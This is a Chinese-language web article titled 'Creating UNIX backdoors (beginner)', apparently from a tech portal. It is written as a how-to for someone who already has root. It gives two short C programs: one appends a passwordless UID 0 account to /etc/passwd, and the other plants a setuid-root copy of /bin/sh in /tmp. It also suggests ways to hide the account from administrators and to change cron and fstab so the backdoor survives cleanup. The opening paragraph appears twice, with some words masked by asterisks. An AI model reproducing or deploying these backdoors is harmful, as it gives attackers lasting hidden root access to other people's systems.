创建UNIX后门(初级篇) 

安全 网站安全
最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。

最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但***别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。


<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->

比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)

在 /tmp 目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是***的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。

<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->

【编辑推荐】

  1. 创建UNIX后门(中级篇)
  2. 创建UNIX后门(高级篇) 
责任编辑:Oo小孩儿 来源: linuxeden.com
相关推荐

2009-07-07 17:12:05

创建UNIX后门

2010-04-14 09:40:05

2016-09-19 08:57:48

2010-04-21 14:39:59

Unix消息队列

2010-11-19 10:01:08

Oracle创建实例

2023-01-10 09:06:17

2023-02-14 22:19:11

2009-09-15 09:23:35

初级linuxLinuxlinu操作系统x后门

2010-09-13 14:57:29

2010-09-13 14:47:58

2010-09-13 15:06:36

2009-10-29 15:28:38

VB.NET文件操作

2013-04-07 13:54:46

Android开发Eclipse配置

2023-05-11 20:15:36

2010-09-13 15:14:03

2010-09-13 15:26:34

2010-08-26 11:15:47

LinuxICMP后门

2022-06-08 11:39:29

经营分析指标

2013-04-07 13:12:56

Android开发Linux平台安装JD

2013-04-07 13:12:51

Android开发Windows安装JD
点赞
收藏

51CTO技术栈公众号